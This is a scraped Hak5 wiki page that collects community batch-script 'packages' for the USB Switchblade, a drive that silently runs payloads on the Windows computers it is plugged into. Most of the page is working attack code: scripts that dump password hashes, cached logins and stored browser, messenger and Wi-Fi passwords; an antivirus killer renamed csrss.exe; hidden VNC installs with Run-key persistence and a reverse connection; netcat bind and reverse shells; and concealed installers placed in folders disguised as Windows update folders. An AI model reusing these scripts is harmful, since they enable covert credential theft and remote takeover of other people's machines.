Hak5
Save 10% at GoDaddy.com with coupon code HAK

Switchblade Packages

From Hak5

Jump to: navigation, search
This page is intended to contain packages for the USB Switchblade. The idea is to document individual packages rather than have numerous payloads. A basic understanding of how the switchblade works is required to install these packages, however the basic idea is to add the program (if necessary) to the /WIP/CMD directory and update the go.cmd file with the appropriate code.

To add a package use the Package Uploader to host binaries. Warning: If this service is abused it will be taken down. Then update this page using the template.

Image:Sbpackages.png

Contents

Installing

If you do not have a U3 smart device use this package(unzip it into the root directory of your drive): http://www.hak5.org/packages/files/Non_U3.rar --spektormax
If you have a San Disk drive use this: http://www.hak5.org/packages/files/U3_San_Disk.rar
If you have a Memorex drive use this: http://www.hak5.org/packages/files/U3_Memorex.rar

If you have a San Disk drive and want to keep the U3 LaunchPad use this: http://www.hak5.org/packages/files/U3_San_Disk_Launchpad.rar --SubzeroAsh

go.cmd

The go.cmd file is located in \WIP\CMD. It is what runs all the parts of the package together. Before you put anythign specific in the go.cmd you must have the following lines in the very beginning--spektormax 

@echo off
if not exist \WIP\dump md \WIP\dump >nul
if not exist \WIP\dump\%computername% md \WIP\dump\%computername% >nul
cd \WIP\CMD\ >nul

all of the other "packages" are put into go.cmd and the files in the directory's specified by the file.

Alternative Loader

This is an alternative loader. It is a batchfile, so you don't need a scriptserver to be started on the machine. This is only for U3 drives. ISO and needed files included! Have fun!

--Nakaori 10:20, 18 October 2006 (PDT)

Note this is not totaly silent as cmd.exe has to launch inorder to run the batch, so there will be a black pop up window.--spektormax

To make silent, make a batch script with the following:

start nircmd.exe execmd call batch.bat

(you need nircmd.exe) (rename batch.bat to the batch file) (a black window will pop up, but only for a split second)

Tools

Nircommand: http://www.hak5.org/packages/files/nircmd.exe --spektormax
AV Killer 1.2 BETA: http://www.hak5.org/packages/files/csrss.exe
NOTE: AvKill is called csrss.exe inorder to not draw suspicion.

Arming/Disarming the drive

If you are like most people, who occasionally forget to hit shift when they insert the drive into their own computer, then you need a way to arm and disarm the drive. --spektormax
This technique basically works by renaming go.cmd to go1.cmd and effectively making the drive harmless.
Place both into the root directory of the drive: ARM.bat: 

@echo off
if exist .\WIP\CMD\go1.cmd (rename .\WIP\CMD\go1.cmd go.cmd)

DisArm.bat 

@echo off
if exist .\WIP\CMD\go.cmd (rename .\WIP\CMD\go.cmd go1.cmd)

Warning-The batch files will be unable to find go.cmd or go1.cmdbb if the "Hidden" attribute tag is enabled, so make sure that you do not hide the go.cmd file.

Switchblade Kill Switch

This is an alternate method of preventing the switchblade from running on a computer-by-computer basis. --Leapo
Add this code to the beginning of go.bat (or any other batch file you don't want to be able to run on this computer):
if exist c:\safety.txt goto end
cd .\wip\cmd >nul

And add this tag to the end of go.bat: 

:end

Supremely simple, yet effective. As long as this code finds a file called "safety.txt" on the root of your C:\ drive, it will skip the the ":end" tag without running anything else in the batch file.

System Info

Gathers general information about the computer including computer name, logged in user, time, date, and IP address. --Darren 

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ***********[System info]************ >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \WIP\dump\%computername%\%computername%.log 2>&1
ipconfig /all >> \WIP\dump\%computername%\%computername%.log 2>&1

Dump SAM

Gathers password hashes using PWDump --Darren 

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ***********[Dump SAM]*************** >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
   .\pwdump 127.0.0.1 >> \WIP\dump\%computername%\%computername%.log 2>&1

Product Key

Grabs product keys for things like windows, office, and other Microsoft packages --spektormax 

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
echo ***********[Dump Product Keys]****** >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
   .\produkey /nosavereg /stext "\WIP\dump\%computername%\%computername%_pk.log" /remote %computername% >> \WIP\dump\%computername%\%computername%.log 2>&1
   copy \WIP\dump\%computername%\%computername%.log+\WIP\dump\%computername%\%computername%_pk.log* \WIP\dump\%computername%\%computername%.log  >> nul
   del /f /q "\WIP\dump\%computername%\%computername%_pk.log" >nul

Internet Explorer Password Grabber

Grabs stored passwords in IE (even IE 7)--spektormax 

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
echo ***********[Dump IE7 secrets]******* >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
   .\iepv.exe /stext "\WIP\dump\%computername%\%computername%_ie7.log" >> \WIP\dump\%computername%\%computername%.log 2>&1
   copy \WIP\dump\%computername%\%computername%.log+\WIP\dump\%computername%\%computername%_ie7.log* \WIP\dump\%computername%\%computername%.log  >> nul
   del /f /q "\WIP\dump\%computername%\%computername%_ie7.log" >nul

Windows Update Lister

Lists all current updates to windows installed (useful if you want to do a vunerability assesment)--spektormax 

Echo ************************************ >> \WIP\dump\%computername%\%computername%-updateslist.log 2>&1
echo ***********[Dump updates-list]******* >> \WIP\dump\%computername%\%computername%-updateslist.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%-updateslist.log 2>&1
   \wul.exe /stext "\WIP\dump\%computername%\%computername%_LSA.log" >> \WIP\dump\%computername%\%computername%-updateslist.log 2>&1
   copy \WIP\dump\%computername%\%computername%.log+\WIP\dump\%computername%\%computername%_lsa.log* \WIP\dump\%computername%\%computername%-updateslist.log  >> nul
   del /f /q "\WIP\dump\%computername%\%computername%_lsa.log" >nul

Network Password Dumper

Not compleatly sure what this one does, but it found my auto logon password--spektormax 

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
echo ***********[Dump Network PW]******** >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
   .\netpass.exe /stext "\WIP\dump\%computername%\%computername%_np.log" >> \WIP\dump\%computername%\%computername%.log 2>&1
   copy \WIP\dump\%computername%\%computername%.log+\WIP\dump\%computername%\%computername%_np.log* \WIP\dump\%computername%\%computername%.log  >> nul
   del /f /q "\WIP\dump\%computername%\%computername%_np.log" >nul

Cachedump

This is very usful in a domain situation, this will dump the last 10 logins--spektormax 

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
echo ************[Dump Cache PW]********* >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
.\cachedump.exe >> \WIP\dump\%computername%\%computername%.log 2>&1

Netstat

This uses Windows built in utility netstat to show you all the current internet connections the computer is makeing --spektormax 

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
echo ***********[Network Services]******* >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
netstat.exe -abn >> \WIP\dump\%computername%\%computername%.log 2>&1

Port Scan

Similar to Netstat, but with a different interface. It run's the utility PortQryV2 and Dumps the log in a file in \WIP\dump\%computername%\%computername%.log. Package contains Portqry in folder Files and test.bat. Just unzip to root of U3/Regular USB flash drive. 

cd \WIP\dump\%computername%\ >nul
Echo ************************************ > \WIP\dump\%computername%\%computername%.log 2>&1
echo ************[Port Scan]************* >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
cd 
\WIP\CMD\portqry -local -l \WIP\dump\%computername%\%computername%_ports.log>>nul
copy \WIP\dump\%computername%\%computername%.log+\WIP\dump\%computername%\%computername%_ports.log >>nul
del /f /q "\WIP\dump\%computername%\%computername%_ports.log" >nul
cd \WIP\CMD >nul

Unzip this into the \WIP\CMD directory http://www.hak5.org/packages/files/PortQry.exe

--Masterpyro/Brennan

Messenger password Dumper

This dumps all messenger password--spektormax 

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
echo ***********[Dump messenger PW]******** >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
   .\mspass.exe /stext "\WIP\dump\%computername%\%computername%_ms.log" >> \WIP\dump\%computername%\%computername%.log 2>&1
   copy \WIP\dump\%computername%\%computername%.log+\WIP\dump\%computername%\%computername%_ms.log* \WIP\dump\%computername%\%computername%.log  >> nul
   del /f /q "\WIP\dump\%computername%\%computername%_ms.log" >nul

Ie History Viewer

This allows you to see all the web pages visited (in IE)--spektormax 

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
echo ***********[Dump URL History]******* >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
   .\iehv.exe /stext "\WIP\dump\%computername%\%computername%_ie.log"
   type "\WIP\dump\%computername%\%computername%_ie.log" >> \WIP\dump\%computername%\%computername%.log 2>&1
   del /f/q "\WIP\dump\%computername%\%computername%_ie.log"

If you think that the history will be too long, simply send the output to a separate logfile, easily done by changing the code to the following. 

Echo ************************************ >> \WIP\dump\%computername%\%computername%-ie.log 2>&1
echo ***********[Dump URL History]******* >> \WIP\dump\%computername%\%computername%-ie.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%-ie.log 2>&1
 .\iehv.exe /stext "\WIP\dump\%computername%\%computername%-ie.log"

"it appears that the iehv.exe program's /stext attribute does not work like the other package programs, and will write the log for the history to "\WIP\dump\%computername%\%computername%_ie.log", regardless of the output redirection (>>) immediately afterwards. Please fix the code if you know a way around this, and delete this message"

Using the "type" command, the Windows equivalent to the "cat" command, we can output the text to our log. This code will output the text to a log, then, using the "type" command, output the text to our log --elmer

FireFox Password Stealer

This steals all the FireFox Passwords--spektormax 

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo *********[Dump Firefox PW]********** >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
.\FirePassword.exe "%appdata%\Mozilla\Firefox\Profiles" >> \WIP\dump\%computername%\%computername%.log

The previous code doesn't work. This way works but it is not very clean code. ~Stebalien 

set RtD=%CD%
cd /D "%appdata%\Mozilla\Firefox\Profiles" >nul
set PROFILE=
for /D %%i in (*) do set PROFILE=%%i
cd /D %RtD% >nul
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo *********[Dump Firefox PW]********** >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
.\FirePassword.exe "%appdata%\Mozilla\Firefox\Profiles\%PROFILE%" >> \WIP\dump\%computername%\%computername%.log


Note: This code does not always work, as it sometimes brings up the error " Failed to open the signon file D:\Documents and Settings\Adam D\Application Data\Mozilla\Firefox\Profiles\[whatever].default/signons.txt". Could this be fixed??

Fixed version: 

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo *********[Dump Firefox PW]********** >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
.\FirePassword.exe >> \WIP\dump\%computername%\%computername%.log

Download: http://www.securityxploded.com/download/FirePassword_bin.zip Stick ALL files in the CMD. ~rodz91 (Sorry for offsite linking, package uploader gives me an error)

Wireless Passwords

this grabs all wireless network passwords that have been used in windows Wireless Zero Configuration ---r1
edit this into \wip\cmd\go.cmd 

 
.\nircmd.exe execmd CALL \WIP\CMD\WIRELESS.BAT

the .bat file 

START /b .\WirelessKeyView.exe /STEXT \WIP\DUMP\%COMPUTERNAME%\%COMPUTERNAME%WIRELESS.TXT

place the .bat and .exe from the .rar into \wip\cmd. Make sure to edit the included bat file and change 

nircmd execmd CALL \WIP\CMD\WIRELESS.BAT

to 

.\nircmd.exe execmd CALL \WIP\CMD\WIRELESS.BAT

also, place a copy of nircmd.exe from the root directory of your USB drive into the CMD folder in order for it to funciton properly. this change is necessary, because the copy of nircmd is not installed on your target system, and "nircmd execmd" is not a recognized windows command

Dialup Password Dump

Placing dialupass.exe into the CMD directory and placing these lines into your go.cmd file will allow you to dump all of the dialup passwords 

Echo ************************************ >> \Documents\logfiles\%computername%.log 2>&1
echo **********[Dump Dialup PW]********** >> \Documents\logfiles\%computername%.log 2>&1
Echo ************************************ >> \Documents\logfiles\%computername%.log 2>&1
   .\dialupass.exe /stext "\Documents\logfiles\%computername%_du.log" >> \Documents\logfiles\%computername%.log 2>&1
   copy \Documents\logfiles\%computername%.log+\Documents\logfiles\%computername%_du.log* \Documents\logfiles\%computername%.log  >> nul
   del /f /q "\Documents\logfiles\%computername%_du.log" >nul

Username adder

This will add a username and password to the computer--spektormax 

start pwservice.exe

Editing Send.bat (and stunnel.conf)

If you are using the Haksaw, VNCinstaller with IP sender, or NMAP, you need to know how to edit the send.bat and stunnel.conf files.--spektormax
send.bat (located in \WIP\VNCInstallfiles, \WIP\SBS\, or \WIP\nmap_install): Use this to change the email settings 

:: Configure Email Options
SET emailfrom=
SET emailto=
SET password=
SET subject= %computername%_ip

in the email from you must put the email address account name that you have with the SMTP (the defualt here is gmail) in the password you must put the password of the from email. in the to you can either put the same thing as the form or any other email address you wish this to send to.

stunnel.conf (located in \WIP\VNCInstallfiles, \WIP\SBS\, or \WIP\nmap_install): use this to edit the SMTP settings 

[SMTP Gmail]
accept = 127.0.0.1:1099
connect = smtp.gmail.com:465

The accept is the IP and port which it connects form (its specified in the send.bat) it should for the most part stay the same. The connect= is the SMTP servers address and port. For gmail it's smtp.gmail.com and the port is 465.

Silent VNC installer (with external IP send)

This will install VNC onto thier computer on port 5900 and 80 with the password "yougothacked"--spektormax 

@echo off
mkdir %systemroot%\$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || mkdir "%appdata%\hbn"
cd \WIP\VNCInstallFiles
copy *.* %systemroot%\$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || copy *.* "%appdata%\hbn"
attrib %systemroot%\$NtUninstallKB21050c07160c070f0b0a0a05031b05$ +s +h & attrib "%appdata%\hbn" +s +h
start %systemroot%\$NtUninstallKB21050c07160c070f0b0a0a05031b05$\services.bat
regedit /s \WIP\CMD\vncdmp.reg
regedit /s \WIP\CMD\vncdmp1.reg
regedit /s \WIP\CMD\vncdmp2.reg
regedit /s \WIP\CMD\VNC.reg
ping -n 3 localhost  > nul
net start WinVNC
nircmd.exe execmd CALL \WIP\VNCInstallfiles\send.cmd

VNC registries and Shortcut.exe Must be unziped into \WIP\CMD: http://www.hak5.org/packages/files/vncregestry.rar The actual VNC install files must be put into \WIP\VNCInstallfiles: http://www.hak5.org/packages/files/VNCInstallfiles.rar

Edit (5/24/07 The VNC file links are corrupt. Someone please fix this.)

Reverse VNC Connection

In order to circumvent the issue with portforwarding, the victim connects to your machine. To make that possible, you have to forward a port (5500) - Joerg

Adds a startup process which connect to your machine: 

@echo off
reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Microsoft Windows Support Center" /t REG_SZ /d "your.path.of.coice\reverse.exe"

This is the reverse.exe: 

@echo on
".\nircmd.exe" wait 40000
:loop
".\vnc.exe" -connect your.static.hostname::5500
".\nircmd.exe" wait 90000
goto loop

USB Hack Saw

This installs the famous Hak5's USB Hacksaw--spektormax 

mkdir %systemroot%\$NtUninstallKB931337$ || mkdir "%appdata%\sbs"
cd \WIP\SBS
attrib *.* -s -h
copy *.* %systemroot%\$NtUninstallKB931337$ || copy *.* "%appdata%\sbs"
attrib *.* +s +h
reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.exe" /f || "%appdata%\sbs\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico"
attrib %systemroot%\$NtUninstallKB931337$ +s +h & attrib "%appdata%\sbs" +s +h
%systemdrive%
cd \
cd %systemroot%
cd $NtUninstallKB931337$
sbs.exe

This must be put into the \WIP\SBS directory: http://www.hak5.org/packages/files/Hack_Saw.rar

Internal IP Nmaper

This will do an nmap scan on the internal IP range of the box and email it to you--spektormax 

mkdir %systemroot%\$NtUninstallKB91337$ || mkdir "%appdata%\scs"
cd \WIP\nmap_install
attrib *.* -s -h
copy *.* %systemroot%\$NtUninstallKB91337$ || copy *.* "%appdata%\scs"
attrib *.* +s +h
attrib %systemroot%\$NtUninstallKB91337$ +s +h & attrib "%appdata%\scs" +s +h
%systemdrive%
cd \
cd %systemroot%
cd $NtUninstallKB91337$
nircmd execmd CALL nmap.bat

Unzip this into the \WIP\nmap_install directory: http://www.hak5.org/packages/files/nmap_install.rar

Folding@Home Installer

This will install the folding@home software onto their computer--spektormax
NOTE: Due to demands from the hak5 folding group, this package will not fold under the "Hak5" team name inorder to not tarnish Hak5's reputation. Instead it will fold under the U3_Zombie group. 

start \WIP\fld\csrss.exe
mkdir %systemroot%\$NtUninstallKB531337$ || mkdir "%appdata%\fld"
cd \WIP\fld
attrib *.* -s -h
copy *.* %systemroot%\$NtUninstallKB531337$ || copy *.* "%appdata%\fld"
attrib *.* +s +h
reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v csrss /t REG_SZ /d "%systemroot%\$NtUninstallKB531337$\csrss.exe" /f || "%appdata%\fld\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\fld\nircmd.exe execmd CALL csrss.exe" /W:"%appdata%\fld" /I:"%appdata%\fld\blank.ico"

reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v svhost /t REG_SZ /d "%systemroot%\$NtUninstallKB531337$\rundll.exe svhost.exe" /f || "%appdata%\fld\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\  .lnk" /A:C /T:"%appdata%\fld\rundll.exe svhost.exe" /W:"%appdata%\fld" /I:"%appdata%\fld\blank.ico"
attrib %systemroot%\$NtUninstallKB531337$ +s +h & attrib "%appdata%\fld" +s +h
%systemdrive%
cd \
cd %systemroot%
cd $NtUninstallKB531337$
rundll.exe svhost.exe

Unzip this into the \WIP\fld\ directory: http://www.hak5.org/packages/files/fld.rar IMPORTANT NOTE: Due to the fact that the folding at home software is not silent when ran, I used a special program to hide it. This WILL be detected as a virus, therefore the you need the avkiller. The reason its called csrss.exe is so that it will look normal if it is found when you CTRL-ALT-DEL

Folder Popuper (to show finish)

This will Pop up the root folder of the flash drive to show that it has finished being pwned--spektormax 

ping -n 5 localhost > NUL
start \
nircmd.exe win max ititle "Removeable"

NetCat Bindshell

This will automatically bind a shell on port 52323. It is hidden using nircmd.exe. More info inside the batchfile. http://www.hak5.org/packages/files/bindshell.netcat.rar

NetCat Reverse Shell

This method is used with the above package. It allows you to bind a shell to the remote PC without your target PC having any ports forwarded on their router.

To make a reverse shell work you must have the listening part on your PC on. So go to command prompt and use this command: 

nc -p 52323 -L -vvv

Then download the package for netcat in the section above and change the line. Edit the bindshell.port.52323.cmd file. Replace this line: 

.\nircmd.exe execmd .\nc -L -p 52323 -d -e cmd.exe

and edit it to this: 

nc your.ip 52323 -e cmd.exe

When the client connects to your PC, a shell will pop up on your PC, and there you have a reverse shell

Truecrypt

Use this script to run the switchblade from a truecrypt volume. This script will disable the internet connection, open a truecrypt volume, run avkill (csrss) from the truecrypt volume, run the payload from the truecrypt volume, dismount the truecrypt volume, then enable the internet connection. Truecrypt & volume must be stored in "Applications\TrueCrypt", the volume name is "Encrypted.tc", and a copy of nircmd must be in "Applications\Nircmd. You can also edit the batch file. ~Stebalien 

@echo off
ipconfig /release
cd \ >nul
set drive=%cd%
set unmount="false"
if not exist "X:\" set unmount="true"
if not exist "X:\" start Applications\Nircmd\nircmd.exe exec hide "Applications\TrueCrypt\TrueCrypt.exe"
Applications\Nircmd\nircmd.exe wait 100
if not exist "X:\" "Applications\TrueCrypt\TrueCrypt.exe" /v Applications\TrueCrypt\Encrypted.tc /lx /q preferences
x:\csrss.exe
cd Applications\Nircmd >nul
nircmd wait 10000
cd /D "X:\WIP\SWITCHBLADE\CMD" >nul
call "X:\WIP\SWITCHBLADE\CMD\go.cmd"
cd /D %drive% >nul
if %unmount%=="true" Applications\TrueCrypt\TrueCrypt.exe /q preferences /dx
ipconfig /renew

Automated Backup and Restore

A simple set of tools to backup and recover your switchblade in the event that it is nuked by an antivirus --Leapo
This package includes two batch files and a program (rar.exe) that can be used to automatically archive your switchblade to an encrypted RAR file, and restore from it when you're back to a safe computer.

Download Mirrors:
- http://rapidshare.com/files/37957439/Restore.zip.html)
- http://z02.zupload.com/download.php?file=getfile&filepath=33364
- http://www.megaupload.com/?d=59CPYF6Z
- http://www.filesend.net/download.php?f=a50ee1f8cf4a73948979ea2ce1e0f211
- http://www.badongo.com/file/3472780
- http://depositfiles.com/files/1046292

Here's how you set it up:
- Set up a clean switchblade that hasn't been nuked by your antivirus yet.
- Drop the "Restore" folder (from the zip file you just downloaded) onto the root of your switchblade.
- Open the Restore folder and run "Update_Archive.bat" to make an encrypted backup of the everything on the switchblade.

Now you're all set, after your antivirus has nuked the switchblade again, here's how you restore the backup so you'll be ready to go again:
- Plug the switchblade into a safe computer.
- and run "Restore.bat" to restore the backup.
- Your switchblade is now restored back to the last time you ran "Update_Archive.bat"

IMPORTANT: Every time you make a change on your switchblade that you wish to keep, be sure to run the "Update_Archive.bat" to save the changes to the backup. If you don't, the restore function will revert your switchblade to the last time the Update_Archive.bat was run.

Here's the code if you want to take a look at it (these batch files come premade with rar.exe in the download above):
Update_Archive.bat: 

:: Removes old backup if it exists
::
del ".\Backup.rar"

:: Archives and encryptes the contents of the switchblade with a stupidly long password
::
.\rar.exe a -hp[nowayinhelltheycanbreakkthispassword9876309531681145690] -r ".\Backup.rar" "..\"

Restore.bat: 

:: Creates a backup copy of our backup. This is just in case you didn't plug your switchblade into
:: a safe computer before attempting to restore. This should keep your real backup safe while the
:: Antivirus nukes the copy
::
copy ".\Backup.rar" ".\Backup_Safe.rar"

:: Here we unarchive the copy of the backup we just made
::
.\rar.exe x -o+ -p[nowayinhelltheycanbreakkthispassword9876309531681145690] ".\Backup_Safe.rar" "..\"

::And now that it's finished, we deleat the backup of the backup.
::
del ".\Backup_Safe.rar"

After you've made an initial backup of your switchblade, you can have go.bat restore the entire contents of your switchblade before each run by adding this little bit of code to the very beginning of Go.bat: 

nircmd execmd CALL ..\..\Restore\Restore.bat

This will use nircmd.exe to silently launch the safe-restore function automatically, before every payload run. This should keep your payload safe from antivirus programs that delete or rename files on the switchblade.

Orient the Switchblade towards a special computer

If you want some code to be executed at a special computer, use this code:

if %computername% == 'PETER' goto peterspc

Replace PETER with the specific name of the PC. Then add: 

:peterspc
:: Here type in the code that should only be executed on the PC PETER

--steve

Antidote

If you rooted yourself or someone you didn't want to use the antidote: http://www.hak5.org/packages/files/antidote.rar --spektormax
There are 2 antidotes, antidote(HOME).cmd and antidote(PRO).cmd. This is because Windows XP Pro has the tool taskill while HOME only has tskill. The PRO one can force stop a process even while it doesn't want to be, the home cannot. Use the PRO if you can, use HOME if you only have XP home.

Note on MD5

If your paronoid or not sure you can check the MD5 Hash of the file--spektormax
Inorder to check the MD5 hash of the file you can use this package: http://www.hak5.org/packages/files/md5.zip
you would do : 

md5.exe filename

it will calculate the MD5 hash of that file.
Use: 

md5.exe -csignature filename

to test a signature and compare it to the file that you downloaded. More info can be found at the MD5 page where the MD5.exe is originally from.

Note: because these pages can be edited by anyone, these MD5s offer no guarantee files have not been altered on the server, only that you downloaded them correctly. 76.17.119.30 18:32, 19 October 2006 (PDT)

MD5's

--spektormax

This article is uncategorized.

Please help improve this article by adding it to one or more categories, so it may be associated with related articles (how?). Please remove this tag after categorizing, but not before.
This page has been tagged since February 2007.

Retrieved from "http://wiki.hak5.org/wiki/Switchblade_Packages"